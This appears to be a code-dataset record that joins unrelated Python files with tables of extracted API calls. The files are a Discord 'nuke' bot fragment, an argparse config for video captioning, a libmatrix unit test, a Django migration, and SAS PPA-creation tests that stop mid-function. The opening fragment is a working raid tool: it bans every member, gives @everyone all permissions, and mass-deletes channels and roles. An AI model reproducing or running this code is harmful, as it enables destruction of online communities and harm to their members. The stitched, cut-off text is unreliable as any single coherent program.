print(f"{Fore.YELLOW}[{cmd.upper()}] Buscando membros no servidor - {self.time()}{Style.RESET_ALL}")
await ctx.guild.subscribe(delay=1.5)
print(f"{Fore.YELLOW}[{cmd.upper()}] Busca concluída... iniciando banimento - {self.time()}{Style.RESET_ALL}")
count = 0
for member in ctx.guild.members:
try:
await member.ban()
print(f"{Fore.YELLOW}[{cmd.upper()}] O membro {member.name} foi banido com sucesso - {self.time()}{Style.RESET_ALL}")
count += 1
except: print(f"{Fore.RED}[{cmd.upper()}] Erro ao banir o membro {member.name} - {self.time()}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[{cmd.upper()}] {count} Membro(s) banido(s) com sucesso - {self.time()}{Style.RESET_ALL}")
@commands.command(aliases=content["nuke"][1:])
@commands.has_permissions(manage_channels=True, manage_roles=True, ban_members=True)
async def nuke(self, ctx):
cmd = ctx.invoked_with.lower()
everyone = ctx.guild.default_role
await everyone.edit(permissions=Permissions.all())
loop = get_running_loop()
loop.create_task(self.ban_all(ctx))
loop.create_task(self.delete_channels(ctx))
loop.create_task(self.delete_roles(ctx))
loop.create_task(self.create_channels(ctx))
loop.create_task(self.create_roles(ctx))
|
[
"discord.ext.commands.command",
"discord.ext.commands.has_permissions",
"random.choice",
"asyncio.get_running_loop",
"discord.Permissions.all",
"datetime.datetime.now"
] |
[((1649, 1694), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "content['spam'][1:]"}), "(aliases=content['spam'][1:])\n", (1665, 1694), False, 'from discord.ext import commands\n'), ((2411, 2457), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "content['purge'][1:]"}), "(aliases=content['purge'][1:])\n", (2427, 2457), False, 'from discord.ext import commands\n'), ((3298, 3354), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "content['create_channels'][1:]"}), "(aliases=content['create_channels'][1:])\n", (3314, 3354), False, 'from discord.ext import commands\n'), ((3360, 3406), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'manage_channels': '(True)'}), '(manage_channels=True)\n', (3384, 3406), False, 'from discord.ext import commands\n'), ((4177, 4233), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "content['delete_channels'][1:]"}), "(aliases=content['delete_channels'][1:])\n", (4193, 4233), False, 'from discord.ext import commands\n'), ((4239, 4285), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'manage_channels': '(True)'}), '(manage_channels=True)\n', (4263, 4285), False, 'from discord.ext import commands\n'), ((4935, 4988), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "content['create_roles'][1:]"}), "(aliases=content['create_roles'][1:])\n", (4951, 4988), False, 'from discord.ext import commands\n'), ((4994, 5037), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'manage_roles': '(True)'}), '(manage_roles=True)\n', (5018, 5037), False, 'from discord.ext import commands\n'), ((5812, 5865), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "content['delete_roles'][1:]"}), "(aliases=content['delete_roles'][1:])\n", (5828, 5865), False, 'from discord.ext import commands\n'), ((5871, 5914), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'manage_roles': '(True)'}), '(manage_roles=True)\n', (5895, 5914), False, 'from discord.ext import commands\n'), ((6517, 6565), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "content['ban_all'][1:]"}), "(aliases=content['ban_all'][1:])\n", (6533, 6565), False, 'from discord.ext import commands\n'), ((6571, 6613), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'ban_members': '(True)'}), '(ban_members=True)\n', (6595, 6613), False, 'from discord.ext import commands\n'), ((7488, 7533), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "content['nuke'][1:]"}), "(aliases=content['nuke'][1:])\n", (7504, 7533), False, 'from discord.ext import commands\n'), ((7539, 7626), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'manage_channels': '(True)', 'manage_roles': '(True)', 'ban_members': '(True)'}), '(manage_channels=True, manage_roles=True,\n ban_members=True)\n', (7563, 7626), False, 'from discord.ext import commands\n'), ((7812, 7830), 'asyncio.get_running_loop', 'get_running_loop', ([], {}), '()\n', (7828, 7830), False, 'from asyncio import get_running_loop\n'), ((3572, 3590), 'random.choice', 'choice', (['self.nomes'], {}), '(self.nomes)\n', (3578, 3590), False, 'from random import choice\n'), ((5199, 5217), 'random.choice', 'choice', (['self.nomes'], {}), '(self.nomes)\n', (5205, 5217), False, 'from random import choice\n'), ((3642, 3712), 'random.choice', 'choice', (["[f'Nuked By {self.client.user.name}', 'Nuked with HyperNuker']"], {}), "([f'Nuked By {self.client.user.name}', 'Nuked with HyperNuker'])\n", (3648, 3712), False, 'from random import choice\n'), ((5268, 5338), 'random.choice', 'choice', (["[f'Nuked By {self.client.user.name}', 'Nuked with HyperNuker']"], {}), "([f'Nuked By {self.client.user.name}', 'Nuked with HyperNuker'])\n", (5274, 5338), False, 'from random import choice\n'), ((1528, 1542), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1540, 1542), False, 'from datetime import datetime\n'), ((7777, 7794), 'discord.Permissions.all', 'Permissions.all', ([], {}), '()\n', (7792, 7794), False, 'from discord import Permissions\n')]
|
import argparse
# set for MSR-VTT defaults
def parse_opts():
parser = argparse.ArgumentParser()
parser.add_argument(
'--dataset',
type=str,
default='msvd',
choices=[
'msvd',
'msrvtt'],
help='Dataset to use')
parser.add_argument(
'--model_id',
type=str,
help='unique identifier for model')
parser.add_argument(
'--results_dir',
type=str,
default='experiments',
help='directory to store results')
parser.add_argument(
'--model_file',
type=str,
help='output model file')
parser.add_argument(
'--result_file',
type=str,
help='output result file')
parser.add_argument(
'--concepts_h5',
type=str,
default='sequencelabel',
help='what concept labels to use as generated from extract_svo.py')
parser.add_argument(
'--train_label_h5',
type=str,
help='path to the h5file containing the preprocessed dataset')
parser.add_argument(
'--val_label_h5',
type=str,
help='path to the h5file containing the preprocessed dataset')
parser.add_argument(
'--test_label_h5',
type=str,
help='path to the h5file containing the preprocessed dataset')
parser.add_argument(
'--train_feat_h5',
type=str,
nargs='+',
help='path to the h5 file containing extracted features')
parser.add_argument(
'--val_feat_h5',
type=str,
nargs='+',
help='path to the h5 file containing extracted features')
parser.add_argument(
'--test_feat_h5',
type=str,
nargs='+',
help='path to the h5 file containing extracted features')
parser.add_argument(
'--bfeat_h5',
type=str,
nargs='+',
help='path to the h5 file containing extracted features')
parser.add_argument(
'--fr_size_h5',
type=str,
help='path to the h5 file containing frame size')
parser.add_argument(
'--train_cocofmt_file',
type=str,
help='Gold captions in MSCOCO format to cal language metrics')
parser.add_argument(
'--val_cocofmt_file',
type=str,
help='Gold captions in MSCOCO format to cal language metrics')
parser.add_argument(
'--test_cocofmt_file',
type=str,
help='Gold captions in MSCOCO format to cal language metrics')
parser.add_argument(
'--train_bcmrscores_pkl',
type=str,
help='Pre-computed Cider-D metric for all captions')
parser.add_argument(
'--train_cached_tokens',
type=str,
help='Path to idx document frequencies to cal Cider on training data')
parser.add_argument(
'--input_features',
default='imrc',
type=str,
help='i image, m motion, r region, c classification')
# Optimization: General
parser.add_argument(
'--max_patience',
type=int,
default=50,
help='max number of epoch to run since the minima is detected -- early stopping')
parser.add_argument(
'--batch_size',
type=int,
default=64,
help='Video batch size (there will be x seq_per_img sentences)')
parser.add_argument(
'--test_batch_size',
type=int,
default=64,
help='what is the batch size in number of images per batch? (there will be x seq_per_img sentences)')
parser.add_argument(
'--train_seq_per_img',
type=int,
default=20,
help='number of captions to sample for each image during training. Done for efficiency since CNN forward pass is expensive.')
parser.add_argument(
'--test_seq_per_img',
type=int,
default=20,
help='number of captions to sample for each image during training. Done for efficiency since CNN forward pass is expensive.')
parser.add_argument(
'--train_captions_per_img',
type=int,
default=20,
help='number of captions to sample for each image during training. Done for efficiency since CNN forward pass is expensive.')
parser.add_argument(
'--test_captions_per_img',
type=int,
default=20,
help='number of captions to sample for each image during training. Done for efficiency since CNN forward pass is expensive.')
parser.add_argument(
'--learning_rate',
type=float,
default=1e-4,
help='learning rate')
parser.add_argument(
'--lr_update',
default=200,
type=int,
help='Number of epochs to update the learning rate.')
# Model settings
parser.add_argument(
'--captioner_type',
type=str,
default='lstm',
choices=[
'lstm',
'gru',
'rnn',
'transformer'],
help='type of RNN')
parser.add_argument(
'--captioner_size',
type=int,
default=512,
help='size of the captioner in number of hidden nodes in each layer')
parser.add_argument(
'--captioner_layers',
type=int,
default=1,
help='number of layers in the captioner')
parser.add_argument(
'--captioner_heads',
type=int,
default=1,
help='number of heads in the captioner')
parser.add_argument(
'--filter_type',
type=str,
default='svo_original',
choices=[
'none',
'tran_enc',
'svo_original',
'svo_transformer',
'svo_transformer_2',
'concept_transformer',
'visual_encoder_only'],
help='type of the filtering prior to captioning')
parser.add_argument(
'--input_encoder_size',
type=int,
default=512,
help='size of the input in number of hidden nodes in each encoder layer')
parser.add_argument(
'--input_encoder_layers',
type=int,
default=0,
help='number of layers in the input encoder')
parser.add_argument(
'--input_encoder_heads',
type=int,
default=1,
help='number of heads in the input encoder')
parser.add_argument(
'--grounder_type',
type=str,
default='none',
choices=[
'none',
'niuc',
'nioc',
'iuc',
'ioc'],
help='type of the grounding prior to captioning')
parser.add_argument(
'--grounder_size',
type=int,
default=512,
help='size of the grounder in number of hidden nodes in each grounder layer')
parser.add_argument(
'--grounder_layers',
type=int,
default=1,
help='number of layers in the grounder')
parser.add_argument(
'--grounder_heads',
type=int,
default=1,
help='number of heads in the grounder decoder')
parser.add_argument(
'--gt_concepts_while_training',
type=int,
default=1,
help='use the ground truth concepts for input into the caption generator during training')
parser.add_argument(
'--gt_concepts_while_testing',
type=int,
default=0,
help='use the ground truth concepts for input into the caption generator during testing, useful for best case check')
parser.add_argument(
'--num_concepts',
type=int,
default=3,
help='number of concepts (normally 3, 5)')
parser.add_argument(
'--att_size',
type=int,
default=512,
help='size of the att in number of hidden nodes')
parser.add_argument(
'--num_lm_layer',
type=int,
default=1,
help='size of the rnn in number of hidden nodes in each layer')
parser.add_argument(
'--input_encoding_size',
type=int,
default=512,
help='the encoding size of each frame in the video.')
parser.add_argument(
'--max_epochs',
type=int,
default=200,
help='max number of epochs to run for (-1 = run forever)')
parser.add_argument(
'--grad_clip',
type=float,
default=0.25,
help='clip gradients at this value (note should be lower than usual 5 because we normalize grads by both batch and seq_length)')
parser.add_argument(
'--drop_prob_lm',
type=float,
default=0.5,
help='strength of dropout in the Language Model RNN')
# Optimization: for the Language Model
parser.add_argument(
'--optim',
type=str,
default='adam',
help='what update to use? sgd|sgdmom|adagrad|adam')
parser.add_argument(
'--optim_alpha',
type=float,
default=0.8,
help='alpha for adagrad/rmsprop/momentum/adam')
parser.add_argument(
'--optim_beta',
type=float,
default=0.999,
help='beta used for adam')
parser.add_argument(
'--optim_epsilon',
type=float,
default=1e-8,
help='epsilon that goes into denominator for smoothing')
# Evaluation/Checkpointing
parser.add_argument(
'--save_checkpoint_from',
type=int,
default=1,
help='Start saving checkpoint from this epoch')
parser.add_argument(
'--save_checkpoint_every',
type=int,
default=1,
help='how often to save a model checkpoint in epochs?')
parser.add_argument(
'--use_rl',
type=int,
default=0,
help='Use RL training or not')
parser.add_argument(
'--use_rl_after',
type=int,
default=0, # 30
help='Start RL training after this epoch')
parser.add_argument(
'--expand_feat',
type=int,
default=1,
help='To expand features when sampling (to multiple captions)')
parser.add_argument(
'--start_from',
type=str,
default='',
help='Load state from this file to continue training')
parser.add_argument(
'--language_eval',
type=int,
default=1,
help='Evaluate language evaluation')
parser.add_argument(
'--eval_metric',
default='CIDEr',
choices=[
'Loss',
'Bleu_4',
'METEOR',
'ROUGE_L',
'CIDEr',
'MSRVTT'],
help='Evaluation metrics')
parser.add_argument(
'--test_language_eval',
type=int,
default=1,
help='Evaluate language evaluation')
parser.add_argument(
'--print_log_interval',
type=int,
default=20,
help='How often do we snapshot losses, for inclusion in the progress dump? (0 = disable)')
parser.add_argument(
'--loglevel',
type=str,
default='DEBUG',
choices=[
'DEBUG',
'INFO',
'WARNING',
'ERROR',
'CRITICAL'])
# misc
parser.add_argument(
'--seed',
type=int,
default=123,
help='random number generator seed to use')
parser.add_argument(
'--gpuid',
type=int,
default=7,
help='which gpu to use. -1 = use CPU')
parser.add_argument(
'--num_chunks',
type=int,
default=1,
help='1: no attention, > 1: attention with num_chunks')
parser.add_argument(
'--model_type',
type=str,
default='concat',
choices=[
'standard',
'concat',
'manet',
],
help='Type of models')
parser.add_argument(
'--decouple',
type=int,
default=0,
choices=[0,1],
help='decouple the concept and visual feats?')
parser.add_argument(
'--pass_all_svo',
type=int,
default=0,
choices=[0,1],
help='Pass all s,v,o to the LSTM cap gen, or just v')
parser.add_argument(
'--clamp_concepts',
type=int,
default=1,
choices=[0, 1],
help='0: Use decoder output at t-1 as decoder input at t. 1: Clamp decoder output at t-1 to best word, and get this word embedding for decoder input at t.')
parser.add_argument(
'--beam_size',
type=int,
default=5,
help='Beam search size')
parser.add_argument(
'--labda',
type=float,
default=12.0,
help='Weights on svos over captions')
parser.add_argument(
'--use_ss',
type=int,
default=0,
help='Use schedule sampling')
parser.add_argument(
'--use_ss_after',
type=int,
default=0,
help='Use schedule sampling after this epoch')
parser.add_argument(
'--ss_max_prob',
type=float,
default=0.25,
help='Use schedule sampling')
parser.add_argument(
'--ss_k',
type=float,
default=100,
help='plot k/(k+exp(x/k)) from x=0 to 400, k=30')
parser.add_argument(
'--use_mixer',
type=int,
default=0, # 1
help='Use schedule sampling')
parser.add_argument(
'--mixer_from',
type=int,
default=-1,
help='If -1, then an annealing scheme will be used, based on mixer_descrease_every.\
Initially it will set to the max_seq_length (30), and will be gradually descreased to 1.\
If this value is set to 1 from the begininig, then the MIXER approach is not applied')
parser.add_argument(
'--mixer_descrease_every',
type=int,
default=2,
help='Epoch interval to descrease mixing value')
parser.add_argument(
'--use_cst',
type=int,
default=0,
help='Use cst training')
parser.add_argument(
'--use_cst_after',
type=int,
default=0,
help='Start cst training after this epoch')
parser.add_argument(
'--cst_increase_every',
type=int,
default=5,
help='Epoch interval to increase cst baseline')
parser.add_argument(
'--scb_baseline',
type=int,
default=1,
help='which Self-consensus baseline (SCB) to use? 1: GT SCB, 2: Model Sample SCB')
parser.add_argument(
'--scb_captions',
type=int,
default=0,
help='-1: annealing, otherwise using this fixed number to be the number of captions to compute SCB')
parser.add_argument(
'--use_eos',
type=int,
default=0,
help='If 1, keep <EOS> in captions of the reference set')
parser.add_argument(
'--output_logp',
type=int,
default=0,
help='Output average log likehood of the test and GT captions. Used for robustness analysis at test time.')
args = parser.parse_args()
return args
|
[
"argparse.ArgumentParser"
] |
[((76, 101), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (99, 101), False, 'import argparse\n')]
|
import ctypes
import ctypes.util
import os
import unittest
import sys
import meg
class TestLibmatrix(unittest.TestCase):
def test(self):
matrix = meg.libmatrix.mxCreateDoubleMatrix(
3, 4, meg.libmatrix.Complexity.REAL)
self.assertEqual(meg.libmatrix.mxIsNumeric(matrix), True)
self.assertEqual(meg.libmatrix.mxGetNumberOfDimensions(matrix), 2)
shape = meg.libmatrix.mxGetDimensions(matrix)
self.assertEqual((shape[0], shape[1]), (3,4))
with self.assertRaises(RuntimeError):
meg.libmatrix.mxGetImagData(matrix)
meg.libmatrix.mxDestroyArray(matrix)
if __name__ == "__main__":
unittest.main()
|
[
"unittest.main",
"meg.libmatrix.mxIsNumeric",
"meg.libmatrix.mxDestroyArray",
"meg.libmatrix.mxGetDimensions",
"meg.libmatrix.mxGetImagData",
"meg.libmatrix.mxGetNumberOfDimensions",
"meg.libmatrix.mxCreateDoubleMatrix"
] |
[((691, 706), 'unittest.main', 'unittest.main', ([], {}), '()\n', (704, 706), False, 'import unittest\n'), ((160, 231), 'meg.libmatrix.mxCreateDoubleMatrix', 'meg.libmatrix.mxCreateDoubleMatrix', (['(3)', '(4)', 'meg.libmatrix.Complexity.REAL'], {}), '(3, 4, meg.libmatrix.Complexity.REAL)\n', (194, 231), False, 'import meg\n'), ((402, 439), 'meg.libmatrix.mxGetDimensions', 'meg.libmatrix.mxGetDimensions', (['matrix'], {}), '(matrix)\n', (431, 439), False, 'import meg\n'), ((614, 650), 'meg.libmatrix.mxDestroyArray', 'meg.libmatrix.mxDestroyArray', (['matrix'], {}), '(matrix)\n', (642, 650), False, 'import meg\n'), ((270, 303), 'meg.libmatrix.mxIsNumeric', 'meg.libmatrix.mxIsNumeric', (['matrix'], {}), '(matrix)\n', (295, 303), False, 'import meg\n'), ((336, 381), 'meg.libmatrix.mxGetNumberOfDimensions', 'meg.libmatrix.mxGetNumberOfDimensions', (['matrix'], {}), '(matrix)\n', (373, 381), False, 'import meg\n'), ((561, 596), 'meg.libmatrix.mxGetImagData', 'meg.libmatrix.mxGetImagData', (['matrix'], {}), '(matrix)\n', (588, 596), False, 'import meg\n')]
|
# Generated by Django 3.0.3 on 2020-05-30 16:13
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('courses', '0015_course_fee_type'),
('profiles', '0001_initial'),
('course_homes', '0015_learningtopic_info'),
]
operations = [
migrations.AddField(
model_name='coursehome',
name='end_date',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='coursehome',
name='expected_date',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='coursehome',
name='open_date',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='coursehome',
name='over_admission_days',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='coursehome',
name='teacher',
field=models.ForeignKey(blank=True, limit_choices_to={'is_teacher': True}, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='teacher_course', to='profiles.Profile'),
),
migrations.AlterField(
model_name='coursehome',
name='course',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='c_homes', to='courses.Course'),
),
migrations.AlterField(
model_name='coursehome',
name='status',
field=models.CharField(choices=[('open', 'Active'), ('closed', 'Closed'), ('full', 'Full')], default='open', max_length=10),
),
]
|
[
"django.db.models.DateField",
"django.db.models.IntegerField",
"django.db.models.CharField",
"django.db.models.ForeignKey"
] |
[((461, 500), 'django.db.models.DateField', 'models.DateField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (477, 500), False, 'from django.db import migrations, models\n'), ((631, 670), 'django.db.models.DateField', 'models.DateField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (647, 670), False, 'from django.db import migrations, models\n'), ((797, 836), 'django.db.models.DateField', 'models.DateField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (813, 836), False, 'from django.db import migrations, models\n'), ((973, 1015), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (992, 1015), False, 'from django.db import migrations, models\n'), ((1140, 1328), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'limit_choices_to': "{'is_teacher': True}", 'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""teacher_course"""', 'to': '"""profiles.Profile"""'}), "(blank=True, limit_choices_to={'is_teacher': True}, null=\n True, on_delete=django.db.models.deletion.CASCADE, related_name=\n 'teacher_course', to='profiles.Profile')\n", (1157, 1328), False, 'from django.db import migrations, models\n'), ((1444, 1556), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""c_homes"""', 'to': '"""courses.Course"""'}), "(on_delete=django.db.models.deletion.CASCADE, related_name\n ='c_homes', to='courses.Course')\n", (1461, 1556), False, 'from django.db import migrations, models\n'), ((1677, 1798), 'django.db.models.CharField', 'models.CharField', ([], {'choices': "[('open', 'Active'), ('closed', 'Closed'), ('full', 'Full')]", 'default': '"""open"""', 'max_length': '(10)'}), "(choices=[('open', 'Active'), ('closed', 'Closed'), ('full',\n 'Full')], default='open', max_length=10)\n", (1693, 1798), False, 'from django.db import migrations, models\n')]
|
# Copyright 2018 SAS Project Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of PCR tests."""
import json
import logging
import os
import sas_testcase
import uuid
from shapely import ops
from full_activity_dump_helper import getFullActivityDumpSasUut
from reference_models.ppa import ppa
from reference_models.geo import drive, utils
from util import configurable_testcase, loadConfig, \
makePalRecordsConsistent, writeConfig, getCertificateFingerprint, \
makePpaAndPalRecordsConsistent, getCertFilename
from request_handler import HTTPError
from datetime import datetime, timedelta
import time
SAS_TEST_HARNESS_URL = 'https://test.harness.url.not.used/v1.2'
def getSasUutClaimedPpaBoundaryFilePath(config_filename):
"""Get the absolute file path SAS UUT claimed PPA boundary to be stored.
Args:
config_filename: The absolute file path of the configuration file used in PCR.1 test.
It is required to differentiate SAS UUT claimed PPA boundary stored as result of
PCR.1 test executed with different configuration file.
Returns:
An expected absolute file path of PPA zone to be stored which is received SAS UUT
as part of PCR.1 test.
"""
ppa_zone_data_dir_path = os.path.join('testcases', 'output',
'test_WINNF_FT_S_PCR_1')
ppa_zone_data_file_name = 'sas_uut_claimed_ppa_boundary_' + \
config_filename + '.json'
ppa_zone_data_file_path = os.path.join(ppa_zone_data_dir_path,
ppa_zone_data_file_name)
return ppa_zone_data_file_path
def isPpaWithinServiceArea(pal_records, ppa_zone_geometry):
"""Check if the ppa zone geometry with in service area then return True.
Checks the ppa zone geometry's boundary and interior intersect only with the
interior of the service area (not its boundary or exterior).
Args:
pal_records: A list of pal records to compute service area based on
census_tracts.
ppa_zone_geometry: A PPA polygon dictionary in GeoJSON format.
Returns:
A value is the boolean with the value as True if the ppa zone geometry's
boundary and interior intersect with in the interior of the service
area otherwise value as false.
"""
# Get the census tract for each pal record and convert it to Shapely
# geometry.
census_tracts_for_pal = [
utils.ToShapely(drive.census_tract_driver.GetCensusTract(
pal['license']['licenseAreaIdentifier'])
['features'][0]['geometry']) for pal in pal_records]
pal_service_area = ops.cascaded_union(census_tracts_for_pal)
# Convert GeoJSON dictionary to Shapely object.
ppa_zone_shapely_geometry = utils.ToShapely(ppa_zone_geometry)
return ppa_zone_shapely_geometry.buffer(-1e-6).within(pal_service_area)
def assertRegConditionalsForPpaRefModel(registration_requests,
conditional_registration_data):
"""Check the REG Conditionals for PPA creation model and raises an exception.
Performs the assert to check installationParam present in
registrationRequests or conditional registration data and raises an exception.
PpaCreationModel requires the input registrationRequests to have
'installationParam'. But this parameter is removed for devices where
conditionals are pre-loaded. Adding the 'installationParam' into
registrationRequests by taking the corresponding values from
conditionalRegistrationData.
Args:
registration_requests: A list of individual CBSD registration
requests (each of which is itself a dictionary).
conditional_registration_data: A list of individual CBSD registration
data that need to be preloaded into SAS (each of which is a dictionary).
the fccId and cbsdSerialNumber fields are required, other fields are
optional but required for ppa reference model.
Raises:
Exception: If the installationParam object and required
fields is not found in conditionalRegistrationData and registrationRequests
for category B then raises an exception.
"""
for device in registration_requests:
if 'installationParam' not in device:
install_param_assigned = False
for conditional_params in conditional_registration_data:
# Check if FCC_ID+Serial_Number present in registrationRequest
# and conditional_params match and add the 'installationParam'.
if (conditional_params['fccId'] == device['fccId'] and
conditional_params['cbsdSerialNumber'] == device['cbsdSerialNumber']):
device.update({'installationParam': conditional_params['installationParam']})
install_param_assigned = True
# If the cbsdCategory is not present in registration request then
# assign it to the cbsdCategory in conditional_params.
if 'cbsdCategory' not in device:
# Causes KeyError: 'cbsdCategory' if 'cbsdCategory' does not exist
device['cbsdCategory'] = conditional_params['cbsdCategory']
break
# Raise an exception if InstallationParam is not found in the conditionals.
if not install_param_assigned:
raise Exception("InstallationParam not found in conditionals for device "
"%s:%s" % (device['fccId'], device['cbsdSerialNumber']))
class PpaCreationTestcase(sas_testcase.SasTestCase):
"""Implementation of PCR tests.
Checks the area of the non-overlapping difference between the maximum PPA boundary
created by SAS UUT shall be no more than 10% of the area of the maximum PPA boundary
created by the Reference Model for different varying condition and verify the SAS UUT
is able to create PPA zone or error.
"""
def triggerFadGenerationAndRetrievePpaZone(self, ssl_cert, ssl_key):
"""Triggers FAD and Retrieves PPA Zone Record.
Pulls FAD from SAS UUT. Retrieves the ZoneData Records from FAD,
checks that only one record is present.
Args:
ssl_cert: Path to SAS type cert file to be used for pulling FAD record.
ssl_key: Path to SAS type key file to be used for pulling FAD record.
Returns:
A PPA record of format of ZoneData Object.
"""
# Notify the SAS UUT about the SAS Test Harness.
certificate_hash = getCertificateFingerprint(ssl_cert)
self._sas_admin.InjectPeerSas({'certificateHash': certificate_hash,
'url': SAS_TEST_HARNESS_URL})
# As SAS is reset at the beginning of the test, the FAD records should
# contain only one zone record containing the PPA that was generated.
# Hence the first zone record is retrieved.
uut_fad = getFullActivityDumpSasUut(self._sas, self._sas_admin, ssl_cert,
ssl_key)
# Check if the retrieved FAD that has valid and at least one
# PPA zone record.
uut_ppa_zone_data = uut_fad.getZoneRecords()
self.assertEquals(len(uut_ppa_zone_data), 1,
msg='There is no single PPA Zone record received from SAS'
' UUT')
return uut_ppa_zone_data[0]
def generate_PCR_1_default_config(self, filename):
"""Generate the WinnForum configuration for PCR 1."""
# Load PAL records.
pal_record_a = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_1.json')))
pal_record_b = json.load(
open(os.path.join('testcases', 'testdata', 'pal_record_2.json')))
# Use the FIPS codes of adjacent census tracts.
pal_record_a['fipsCode'] = 20063955100
pal_record_b['fipsCode'] = 20063955200
# Set the PAL frequency.
pal_low_frequency = 3570000000
pal_high_frequency = 3580000000
# Load device info.
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
device_b = json.load(
open(os.path.join('testcases', 'testdata', 'device_b.json')))
device_c = json.load(
open(os.path.join('testcases', 'testdata', 'device_c.json')))
# Set the same user ID for all devices
device_b['userId'] = device_a['userId']
device_c['userId'] = device_a['userId']
# Device_a is Category A.
self.assertEqual(device_a['cbsdCategory'], 'A')
# Device_b is Category B with conditionals pre-loaded.
self.assertEqual(device_b['cbsdCategory'], 'B')
# Make PAL records consistent.
pal_records = makePalRecordsConsistent([pal_record_a, pal_record_b],
pal_low_frequency, pal_high_frequency,
device_a['userId'])
# Set the locations of devices to reside with in service area.
device_a['installationParam']['latitude'], device_a['installationParam'][
'longitude'] = 39.0373, -100.4184
device_b['installationParam']['latitude'], device_b['installationParam'][
'longitude'] = 39.0378, -100.4785
# placed the device_c in between device_a and device_b within service area.
device_c['installationParam']['latitude'], device_c['installationParam'][
'longitude'] = 39.0426, -100.4457
device_c['installationParam']['heightType'] = 'AGL'
# Set the AntennaGain and EIRP capability.
device_a['installationParam']['eirpCapability'] = 30
device_b['installationParam']['eirpCapability'] = 47
device_a['installationParam']['antennaGain'] = 16
device_b['installationParam']['antennaGain'] = 16
conditionals_b = {
'cbsdCategory': device_b['cbsdCategory'],
'fccId': device_b['fccId'],
'cbsdSerialNumber': device_b['cbsdSerialNumber'],
'airInterface': device_b['airInterface'],
'installationParam': device_b['installationParam'],
'measCapability': device_b['measCapability']
}
conditionals = [conditionals_b]
del device_b['installationParam']
del device_b['cbsdCategory']
del device_b['airInterface']
del device_b['measCapability']
# Create the actual config.
devices = [device_a, device_b, device_c]
config = {
'registrationRequests': devices,
'conditionalRegistrationData': conditionals,
'palRecords': pal_records,
'sasTestHarnessCert': getCertFilename('sas.cert'),
'sasTestHarnessKey': getCertFilename('sas.key')
}
writeConfig(filename, config)
@configurable_testcase(generate_PCR_1_default_config)
def test_WINNF_FT_S_PCR_1(self, config_filename):
"""Successful Maximum PPA Creation.
Checks PPA generated by SAS UUT shall be fully contained within the service area.
"""
# Load the Config file
config = loadConfig(config_filename)
# Very light checking of the config file.
self.assertValidConfig(
config, {
'registrationRequests': list,
'conditionalRegistrationData': list,
'palRecords': list,
'sasTestHarnessCert': basestring,
'sasTestHarnessKey': basestring
})
# Register devices and check response.
cbsd_ids = self.assertRegistered(config['registrationRequests'],
config['conditionalRegistrationData'])
# Asserts the REG-Conditional value doesn't exist in the registrationRequest,
# it required to be exist in the registrationRequest data.
assertRegConditionalsForPpaRefModel(config['registrationRequests'],
config['conditionalRegistrationData'])
# Trigger PPA creation to calculate maximum PPA boundary and check if any errors
# encountered in PPA creation reference model.
test_harness_ppa_geometry = ppa.PpaCreationModel(config['registrationRequests'],
config['palRecords'])
# Inject the PAL records.
for pal_record in config['palRecords']:
self._sas_admin.InjectPalDatabaseRecord(pal_record)
# Trigger SAS UUT to create a PPA boundary.
pal_ids = [record['palId'] for record in config['palRecords']]
ppa_creation_request = {
"cbsdIds": cbsd_ids,
"palIds": pal_ids
}
# Trigger PPA Creation to SAS UUT.
ppa_id = self.triggerPpaCreationAndWaitUntilComplete(ppa_creation_request)
logging.debug('ppa_id received from SAS UUT:%s', ppa_id)
# Notify SAS UUT about SAS Harness and trigger Full Activity Dump and
# retrieves the PPA Zone record.
uut_ppa_zone_data = self.triggerFadGenerationAndRetrievePpaZone(
ssl_cert=config['sasTestHarnessCert'],
ssl_key=config['sasTestHarnessKey'])
# Write SAS UUT PPA to output directory of PCR.1 test.
# PPA Zone received from SAS UUT in PCR.1 test will be considered as input
# for PCR 3,PCR 6 and PCR 7 tests.
ppa_zone_data_file_path = getSasUutClaimedPpaBoundaryFilePath(
config_filename.split('/')[-1])
ppa_zone_data_dir_path = os.path.dirname(ppa_zone_data_file_path)
